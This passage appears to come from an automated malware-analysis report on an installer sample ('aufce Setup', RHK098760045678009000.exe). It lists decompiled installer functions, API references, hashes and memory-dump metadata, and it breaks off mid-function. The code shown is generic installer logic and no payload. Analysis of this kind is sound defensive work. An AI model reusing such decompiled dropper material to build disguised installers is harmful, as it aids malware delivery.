                0x00406544
                0x00406548
                0x00406a0e
                0x00000000
                0x00406a0e
                0x0040654e
                0x00406551
                0x00406554
                0x00406557
                0x00406559
                0x00406559
                0x00406559
                0x0040655c
                0x0040655f
                0x00406562
                0x00406565
                0x00406568
                0x0040656b
                0x0040656c
                0x0040656e
                0x0040656e
                0x0040656e
                0x00406571
                0x00406574
                0x00406577
                0x0040657a
                0x0040657a
                0x0040657a
                0x0040657d
                0x00000000
                0x00000000
                0x004067c1
                0x004067c1
                0x004067c1
                0x004067c5
                0x00000000
                0x00000000
                0x004067cb
                0x004067ce
                0x004067d1
                0x004067d4
                0x004067d6
                0x004067d6
                0x004067d6
                0x004067d9
                0x004067dc
                0x004067df
                0x004067e2
                0x004067e5
                0x004067e8
                0x004067e9
                0x004067eb
                0x004067eb
                0x004067eb
                0x004067ee
                0x004067f1
                0x004067f4
                0x004067f7
                0x004067fa
                0x004067fe
                0x00406800
                0x00406803
                0x00000000
                0x00406805
                0x00000000
                0x00406805
                0x00406803
                0x00406a38
                0x00000000
                0x00000000
                0x00406067

                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                • Instruction ID: bc715f9ab80968e75e2fbed037c5f1c5951903de2449374fee89636cff417fa3
                • Opcode Fuzzy Hash: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                • Instruction Fuzzy Hash: 52F18571D00229CBCF28DFA8C8946ADBBB1FF45305F25816ED856BB281D3785A96CF44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405E93, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405E93(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x422588); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x422588;
			}




                0x00405e9e
                0x00405ea7
                0x00000000
                0x00405eb4
                0x00405eaa
                0x00000000

                APIs
                • FindFirstFileA.KERNELBASE(?,00422588,00421940,004057AF,00421940,00421940,00000000,00421940,00421940,?,?,?,004054D1,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 00405E9E
                • FindClose.KERNEL32(00000000), ref: 00405EAA
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Find$CloseFileFirst
                • String ID:
                • API String ID: 2295610775-0
                • Opcode ID: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                • Instruction ID: 22d16aeb20e1d117df59da4f29a20059377f8c00669f4036672bdba2b414caf9
                • Opcode Fuzzy Hash: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                • Instruction Fuzzy Hash: 95D0123190D520ABD7015738BD0C84B7A59DB553323508F32B465F53E0C7788D928AEA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403981, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                Download Yara Rule
                C-Code - Quality: 84%
                			E00403981(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42051c = _t35;
					if(_t115 == 0x110) {
						 *0x423f48 = _t125;
						 *0x420530 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f4f8 = _t91;
						E00403E54(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423728); // executed
						 *0x42370c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42051c = 1;
					}
					_t122 =  *0x4091ac; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423f60;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403EA0(0x40b);
						while(1) {
							_t37 =  *0x42051c;
							 *0x4091ac =  *0x4091ac + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091ac; // 0xffffffff
							__eflags = _t39 -  *0x423f64; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42370c - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x423f64; // 0x2
							__eflags =  *0x4091ac - _t44; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405BBA(_t116, _t125, _t130, 0x42c800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E54(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E54(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E54(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423fcc - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403E76(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f4f8, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423fcc - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x420530);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f4f8);
							}
							E00403E89();
							E00405B98(0x420538, "aufce Setup");
							E00405BBA(0x420538, _t125, _t130,  &(0x420538[lstrlenA(0x420538)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420538);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423718);
									 *0x41fd08 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423f40,  *_t130 +  *0x423720 & 0x0000ffff, _t125,  *(0x4091b0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423718 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E54(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423718, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42370c - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x423718, 8);
									E00403EA0(0x405);
									goto L58;
								}
								__eflags =  *0x423fcc - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x423fc0 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423718);
						 *0x423f48 = _t133;
						EndDialog(_t125,  *0x41f900);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423718, 0x40f, 0, 1);
						__eflags =  *0x42370c - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420510, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420510,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403EBB(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423718, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423fcc - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f900 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E2D();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f900 = _t127;
										goto L21;
									}
									__eflags =  *0x4091ac - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423718);
						 *0x423718 = _a12;
						L58:
						if( *0x421538 == _t133) {
							_t142 =  *0x423718 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x421538 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}
































                0x0040398a
                0x00403993
                0x00403ad4
                0x00403ad8
                0x00403adc
                0x00403ade
                0x00403ae3
                0x00403aee
                0x00403af9
                0x00403afe
                0x00403b00
                0x00403b02
                0x00403b05
                0x00403b0a
                0x00403b18
                0x00403b25
                0x00403b2c
                0x00403b2c
                0x00403b2d
                0x00403b2d
                0x00403b32
                0x00403b38
                0x00403b3f
                0x00403b45
                0x00403b47
                0x00403b87
                0x00403b8c
                0x00403b91
                0x00403b91
                0x00403b96
                0x00403b9f
                0x00403ba1
                0x00403ba6
                0x00403bac
                0x00403bb0
                0x00403bb0
                0x00403bb5
                0x00403bbb
                0x00000000
                0x00000000
                0x00403bc1
                0x00403bc6
                0x00403bcc
                0x00000000
                0x00000000
                0x00403bd5
                0x00403bdd
                0x00403be2
                0x00403be5
                0x00403beb
                0x00403bf0
                0x00403bf3
                0x00403bf9
                0x00403bfe
                0x00403c01
                0x00403c07
                0x00403c0f
                0x00403c15
                0x00403c1b
                0x00403c1f
                0x00403c26
                0x00403c26
                0x00403c26
                0x00403c30
                0x00403c42
                0x00403c4e
                0x00403c53
                0x00403c5d
                0x00403c63
                0x00403c65
                0x00403c6a
                0x00403c67
                0x00403c67
                0x00403c67
                0x00403c7a
                0x00403c92
                0x00403c94
                0x00403c9a
                0x00403caf
                0x00403c9c
                0x00403ca5
                0x00403ca7
                0x00403ca7
                0x00403cb5
                0x00403cc5
                0x00403cd6
                0x00403cdd
                0x00403ce3
                0x00403ce7
                0x00403cec
                0x00403cee
                0x00000000
                0x00403cf4
                0x00403cf4
                0x00403cf6
                0x00000000
                0x00000000
                0x00403cfc
                0x00403d00
                0x00403d25
                0x00403d2b
                0x00403d31
                0x00403d33
                0x00000000
                0x00000000
                0x00403d59
                0x00403d5f
                0x00403d61
                0x00403d66
                0x00000000
                0x00000000
                0x00403d6c
                0x00403d6f
                0x00403d72
                0x00403d89
                0x00403d95
                0x00403dae
                0x00403db4
                0x00403db8
                0x00403dbd
                0x00403dc3
                0x00000000
                0x00000000
                0x00403dcd
                0x00403dd8
                0x00000000
                0x00403dd8
                0x00403d02
                0x00403d08
                0x00000000
                0x00000000
                0x00403d0e
                0x00403d14
                0x00000000
                0x00000000
                0x00000000
                0x00403d1a
                0x00403cee
                0x00403de5
                0x00403df1
                0x00403df8
                0x00000000
                0x00403b49
                0x00403b49
                0x00403b4c
                0x00403b7f
                0x00403b7f
                0x00403b81
                0x00000000
                0x00000000
                0x00000000
                0x00403b81
                0x00403b4e
                0x00403b52
                0x00403b57
                0x00403b59
                0x00000000
                0x00000000
                0x00403b69
                0x00403b71
                0x00000000
                0x00403b77
                0x004039a5
                0x004039a5
                0x004039a9
                0x004039ae
                0x004039bd
                0x004039bd
                0x004039c6
                0x004039cf
                0x004039da
                0x004039da
                0x004039e6
                0x00403a02
                0x00403a05
                0x00403a18
                0x00403a1e
                0x00403ac1
                0x00000000
                0x00403aca
                0x00403a24
                0x00403a31
                0x00403a33
                0x00403a35
                0x00403a54
                0x00403a54
                0x00403a57
                0x00403a5c
                0x00403a5f
                0x00403a6f
                0x00403a70
                0x00403a72
                0x00403aa8
                0x00403abb
                0x00000000
                0x00403abb
                0x00403a74
                0x00403a7a
                0x00403a93
                0x00403a98
                0x00403a9a
                0x00000000
                0x00000000
                0x00403a9c
                0x00403a88
                0x00403a88
                0x00403a8a
                0x00403a8a
                0x00000000
                0x00403a8a
                0x00403a7d
                0x00403a82
                0x00000000
                0x00403a82
                0x00403a61
                0x00403a67
                0x00000000
                0x00000000
                0x00403a69
                0x00000000
                0x00403a69
                0x00403a59
                0x00000000
                0x00403a59
                0x00403a3f
                0x00403a46
                0x00403a4c
                0x00403a4e
                0x00000000
                0x00000000
                0x00000000
                0x00403a4e
                0x00403a0a
                0x00000000
                0x004039e8
                0x004039ee
                0x004039f8
                0x00403dfe
                0x00403e04
                0x00403e06
                0x00403e0c
                0x00403e11
                0x00403e17
                0x00403e17
                0x00403e0c
                0x00403e21
                0x00000000
                0x00403e21
                0x004039e6

                APIs
                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039BD
                • ShowWindow.USER32(?), ref: 004039DA
                • DestroyWindow.USER32 ref: 004039EE
                • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A0A
                • GetDlgItem.USER32 ref: 00403A2B
                • SendMessageA.USER32 ref: 00403A3F
                • IsWindowEnabled.USER32(00000000), ref: 00403A46
                • GetDlgItem.USER32 ref: 00403AF4
                • GetDlgItem.USER32 ref: 00403AFE
                • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403B18
                • SendMessageA.USER32 ref: 00403B69
                • GetDlgItem.USER32 ref: 00403C0F
                • ShowWindow.USER32(00000000,?), ref: 00403C30
                • EnableWindow.USER32(?,?), ref: 00403C42
                • EnableWindow.USER32(?,?), ref: 00403C5D
                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C73
                • EnableMenuItem.USER32 ref: 00403C7A
                • SendMessageA.USER32 ref: 00403C92
                • SendMessageA.USER32 ref: 00403CA5
                • lstrlenA.KERNEL32(00420538,?,00420538,aufce Setup), ref: 00403CCE
                • SetWindowTextA.USER32(?,00420538), ref: 00403CDD
                • ShowWindow.USER32(?,0000000A), ref: 00403E11
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                • String ID: aufce Setup
                • API String ID: 4050669955-1736180195
                • Opcode ID: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                • Instruction ID: 5fd13e9e65c650ae90d185cc2d11acb2e8fe01e0af56b63b73109b0399f4b85d
                • Opcode Fuzzy Hash: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                • Instruction Fuzzy Hash: EFC1CF71A04201BBDB20AF61ED85D2B7EBCEB4470AB40453EF541B51E1C73DAA429F5E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004035EB, Relevance: 49.2, APIs: 14, Strings: 14, Instructions: 215stringregistryCOMMON
                Download Yara Rule
                C-Code - Quality: 96%
                			E004035EB(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t60;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				signed short _t72;
				struct HINSTANCE__* _t76;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t85;

				_t81 =  *0x423f50; // 0x58d7c8
				_t20 = E00405F28(3);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x420538;
					"1033" = 0x7830;
					E00405A7F(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420538, 0);
					__eflags =  *0x420538;
					if(__eflags == 0) {
						E00405A7F(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407342, 0x420538, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					_t72 =  *_t20(); // executed
					E00405AF6("1033", _t72 & 0x0000ffff);
				}
				E004038B4(_t76, _t88);
				_t24 =  *0x423f58; // 0x80
				_t84 = "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp";
				 *0x423fc0 = _t24 & 0x00000020;
				 *0x423fdc = 0x10000;
				if(E0040576C(_t88, "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040576C(_t96, _t84) == 0) {
						E00405BBA(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x423f40, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423728 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E004038B4(_t76, __eflags);
							__eflags =  *0x423fe0; // 0x0
							if(__eflags != 0) {
								_t31 = E00404F56(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42370c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420510, 5); // executed
							_t37 = E00405EBA("RichEd20"); // executed
							__eflags = _t37;
							if(_t37 == 0) {
								E00405EBA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x4236e0);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x4236e0);
								 *0x423704 = _t85;
								RegisterClassA(0x4236e0);
							}
							_t39 =  *0x423720; // 0x0
							_t42 = DialogBoxParamA( *0x423f40, _t39 + 0x00000069 & 0x0000ffff, 0, E00403981, 0); // executed
							E0040353B(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x423f40; // 0x400000
						 *0x4236f4 = _t28;
						_v20 = 0x624e5f;
						 *0x4236e4 = E00401000;
						 *0x4236f0 = _t76;
						 *0x423704 =  &_v20;
						if(RegisterClassA(0x4236e0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420510 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423f40, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t60 =  *0x423f78; // 0x5929fc
					_t79 = 0x422ee0;
					E00405A7F( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) + _t60, 0x422ee0, 0);
					_t62 =  *0x422ee0; // 0x79
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x422ee1;
						 *((char*)(E004056B6(0x422ee1, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405B98(_t84, E0040568B(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E004056D2(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}






























                0x004035f1
                0x004035fa
                0x00403601
                0x00403603
                0x00403617
                0x00403629
                0x00403633
                0x00403638
                0x0040363e
                0x00403651
                0x00403651
                0x0040365c
                0x00403605
                0x00403605
                0x00403610
                0x00403610
                0x00403661
                0x00403666
                0x0040366b
                0x00403674
                0x00403679
                0x0040368a
                0x00403711
                0x00403719
                0x00403722
                0x00403722
                0x00403738
                0x0040373e
                0x0040374c
                0x004037db
                0x004037e3
                0x004037ed
                0x004037f2
                0x004037f8
                0x00403882
                0x00403887
                0x00403889
                0x004038a5
                0x00000000
                0x004038a5
                0x0040388b
                0x00403891
                0x00403899
                0x00403899
                0x00000000
                0x00403891
                0x00403806
                0x00403811
                0x00403816
                0x00403818
                0x0040381f
                0x0040381f
                0x0040382a
                0x00403832
                0x00403834
                0x00403836
                0x0040383f
                0x00403842
                0x00403848
                0x00403848
                0x0040384e
                0x00403867
                0x00403878
                0x00000000
                0x0040387d
                0x004037e5
                0x004037e7
                0x00000000
                0x00403752
                0x00403752
                0x00403758
                0x00403762
                0x0040376a
                0x00403774
                0x0040377a
                0x00403788
                0x004038aa
                0x004038aa
                0x00000000
                0x004038aa
                0x0040378e
                0x00403797
                0x004037d6
                0x00000000
                0x004037d6
                0x00403690
                0x00403690
                0x00403695
                0x00000000
                0x00000000
                0x0040369a
                0x0040369f
                0x004036af
                0x004036b4
                0x004036bb
                0x00000000
                0x00000000
                0x004036bf
                0x004036c1
                0x004036ce
                0x004036ce
                0x004036d6
                0x004036dc
                0x00403704
                0x0040370c
                0x00000000
                0x004036ee
                0x004036ef
                0x004036f8
                0x004036fe
                0x004036ff
                0x00000000
                0x004036ff
                0x004036fa
                0x004036fc
                0x00000000
                0x00000000
                0x00000000
                0x004036fc
                0x004036dc

                APIs
                  • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                  • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                • GetUserDefaultUILanguage.KERNELBASE(00000003,C:\Users\user~1\AppData\Local\Temp\,?,C:\Users\user\Desktop\RHK098760045678009000.exe 0,00000000), ref: 00403605
                  • Part of subcall function 00405AF6: wsprintfA.USER32 ref: 00405B03
                • lstrcatA.KERNEL32(1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user~1\AppData\Local\Temp\,?,C:\Users\user\Desktop\RHK098760045678009000.exe 0,00000000), ref: 0040365C
                • lstrlenA.KERNEL32(ymvwfuvwx,?,?,?,ymvwfuvwx,00000000,C:\Users\user~1\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user~1\AppData\Local\Temp\), ref: 004036D1
                • lstrcmpiA.KERNEL32(?,.exe,ymvwfuvwx,?,?,?,ymvwfuvwx,00000000,C:\Users\user~1\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000), ref: 004036E4
                • GetFileAttributesA.KERNEL32(ymvwfuvwx), ref: 004036EF
                • LoadImageA.USER32 ref: 00403738
                • RegisterClassA.USER32 ref: 0040377F
                • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403797
                • CreateWindowExA.USER32 ref: 004037D0
                • ShowWindow.USER32(00000005,00000000), ref: 00403806
                • GetClassInfoA.USER32 ref: 00403832
                • GetClassInfoA.USER32 ref: 0040383F
                • RegisterClassA.USER32 ref: 00403848
                • DialogBoxParamA.USER32 ref: 00403867
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop\RHK098760045678009000.exe 0$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$ymvwfuvwx$6B
                • API String ID: 606308-2033414949
                • Opcode ID: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
                • Instruction ID: 6624008b3449f808402c67b3262d240ca0850aee1e0dcbc9c28568ef27b6b269
                • Opcode Fuzzy Hash: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
                • Instruction Fuzzy Hash: 6A61E9B17002047EE620AF619D45E3B7ABCEB4474AF40457FF941B22E2D77D9E428A2D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402C55, Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182COMMON
                Download Yara Rule
                C-Code - Quality: 80%
                			E00402C55(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				signed int _t54;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t67;
				signed int _t70;
				signed int _t71;
